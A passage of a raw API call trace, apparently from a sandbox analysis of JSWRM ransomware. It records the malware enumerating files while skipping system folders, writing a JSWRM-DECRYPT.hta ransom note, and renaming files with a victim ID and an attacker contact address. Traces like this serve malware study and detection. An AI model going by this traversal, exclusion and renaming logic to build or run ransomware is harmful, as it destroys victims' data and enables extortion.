ftLastWriteTime.dwLowDateTime=0x1f948318, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x0, dwReserved1=0x0, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0068.645] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0068.645] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0068.645] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0068.645] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0068.645] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0068.645] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0068.645] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0068.645] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0068.645] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0068.645] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0068.645] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.645] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.646] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0068.646] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241358, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.646] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.646] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.646] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.646] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0068.646] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241218, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.646] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.646] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0068.646] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2252a0 | out: hHeap=0x1e0000) returned 1 [0068.646] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0068.646] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0068.646] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3af7a2, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3af7a2, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3af7a2, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0068.646] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2=".") returned 1 [0068.646] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="..") returned 1 [0068.646] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="...") returned 1 [0068.646] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="windows") returned -1 [0068.646] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="recovery") returned 1 [0068.646] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="perflogs") returned 1 [0068.646] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="documents and settings") returned 1 [0068.646] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="$RECYCLE.BIN") returned 1 [0068.646] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="system volume information") returned 1 [0068.646] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="msocache") returned 1 [0068.646] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0068.646] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0068.646] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x345ebd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 15 [0068.646] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0068.646] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0068.646] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0068.646] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x345eba8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 15 [0068.646] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0068.646] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0068.646] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0068.646] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.646] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.647] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0068.647] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ro-RO\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ro-ro\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.647] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10078089222805456) returned 0 [0068.647] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.647] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1e0 [0068.647] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0, lpNumberOfBytesRead=0x345e89c*=0x0, lpOverlapped=0x0) returned 0 [0068.647] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0068.647] CloseHandle (hObject=0xffffffff) returned 1 [0068.647] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0068.647] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.647] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.647] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.647] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.647] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.647] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.647] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0068.647] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.647] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0068.647] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0068.647] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0068.647] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0068.647] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.647] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ro-RO\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ro-ro\\tipresx.dll.mui"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ro-RO\\tipresx.dll.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ro-ro\\tipresx.dll.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.647] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0068.647] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0068.647] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0068.647] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3af7a2, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3af7a2, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3af7a2, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0068.648] FindClose (in: hFindFile=0x231b40 | out: hFindFile=0x231b40) returned 1 [0068.648] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0068.648] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2257f0 | out: hHeap=0x1e0000) returned 1 [0068.648] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224c40 | out: hHeap=0x1e0000) returned 1 [0068.648] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e38953f, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e38953f, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e38953f, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2b600, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="rtscom.dll", cAlternateFileName="")) returned 1 [0068.648] lstrcmpiW (lpString1="rtscom.dll", lpString2=".") returned 1 [0068.648] lstrcmpiW (lpString1="rtscom.dll", lpString2="..") returned 1 [0068.648] lstrcmpiW (lpString1="rtscom.dll", lpString2="...") returned 1 [0068.648] lstrcmpiW (lpString1="rtscom.dll", lpString2="windows") returned -1 [0068.648] lstrcmpiW (lpString1="rtscom.dll", lpString2="recovery") returned 1 [0068.648] lstrcmpiW (lpString1="rtscom.dll", lpString2="perflogs") returned 1 [0068.648] lstrcmpiW (lpString1="rtscom.dll", lpString2="documents and settings") returned 1 [0068.648] lstrcmpiW (lpString1="rtscom.dll", lpString2="$RECYCLE.BIN") returned 1 [0068.648] lstrcmpiW (lpString1="rtscom.dll", lpString2="system volume information") returned -1 [0068.648] lstrcmpiW (lpString1="rtscom.dll", lpString2="msocache") returned 1 [0068.648] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0068.648] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="rtscom.dll", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0068.648] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="rtscom.dll", cchWideChar=10, lpMultiByteStr=0x345ef40, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rtscom.dll", lpUsedDefaultChar=0x0) returned 10 [0068.648] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0068.648] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0068.648] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="rtscom.dll", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0068.648] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="rtscom.dll", cchWideChar=10, lpMultiByteStr=0x345ef10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rtscom.dll", lpUsedDefaultChar=0x0) returned 10 [0068.648] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0068.648] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225878 [0068.648] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0068.648] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa080e4d1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="ru-RU", cAlternateFileName="")) returned 1 [0068.648] lstrcmpiW (lpString1="ru-RU", lpString2=".") returned 1 [0068.648] lstrcmpiW (lpString1="ru-RU", lpString2="..") returned 1 [0068.648] lstrcmpiW (lpString1="ru-RU", lpString2="...") returned 1 [0068.648] lstrcmpiW (lpString1="ru-RU", lpString2="windows") returned -1 [0068.649] lstrcmpiW (lpString1="ru-RU", lpString2="recovery") returned 1 [0068.649] lstrcmpiW (lpString1="ru-RU", lpString2="perflogs") returned 1 [0068.649] lstrcmpiW (lpString1="ru-RU", lpString2="documents and settings") returned 1 [0068.649] lstrcmpiW (lpString1="ru-RU", lpString2="$RECYCLE.BIN") returned 1 [0068.649] lstrcmpiW (lpString1="ru-RU", lpString2="system volume information") returned -1 [0068.649] lstrcmpiW (lpString1="ru-RU", lpString2="msocache") returned 1 [0068.649] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0068.649] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225878 | out: hHeap=0x1e0000) returned 1 [0068.649] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225108 [0068.649] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224d50 [0068.649] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0068.649] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224d50 | out: hHeap=0x1e0000) returned 1 [0068.649] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ru-RU\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ru-ru\\jswrm-decrypt.hta")) returned 0xffffffff [0068.649] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.649] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.649] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345baf4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.649] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0068.649] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24d1d8 [0068.649] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0068.649] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24efa8 [0068.649] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0068.649] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224bb8 [0068.649] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0068.649] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224bb8 | out: hHeap=0x1e0000) returned 1 [0068.649] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ru-RU\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ru-ru\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0068.650] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0068.650] WriteFile (in: hFile=0x454, lpBuffer=0x345bc08*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bbd4, lpOverlapped=0x0 | out: lpBuffer=0x345bc08*, lpNumberOfBytesWritten=0x345bbd4*=0x230c, lpOverlapped=0x0) returned 1 [0068.650] CloseHandle (hObject=0x454) returned 1 [0068.651] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.651] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24efa8 | out: hHeap=0x1e0000) returned 1 [0068.651] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225108 | out: hHeap=0x1e0000) returned 1 [0068.651] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224b30 [0068.651] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2252a0 [0068.651] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225768 [0068.651] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0068.651] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0068.651] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0068.651] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ru-RU\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ru-ru\\jswrm-decrypt.hta")) returned 0x20 [0068.651] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.651] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225768 | out: hHeap=0x1e0000) returned 1 [0068.651] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0068.651] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ru-RU\\*.*", lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa080e4d1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1f948318, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x231e80 [0068.651] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0068.651] FindNextFileW (in: hFindFile=0x231e80, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa080e4d1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1f948318, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0068.651] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0068.651] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0068.651] FindNextFileW (in: hFindFile=0x231e80, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f948318, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1f948318, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1f948318, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x0, dwReserved1=0x0, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0068.651] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0068.651] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0068.652] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0068.652] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0068.652] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0068.652] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0068.652] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0068.652] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0068.652] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0068.652] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0068.652] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.652] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.652] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0068.652] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240f70, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.652] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.652] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.652] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.652] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0068.652] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241038, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.652] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.652] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0068.652] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0068.652] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0068.652] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, 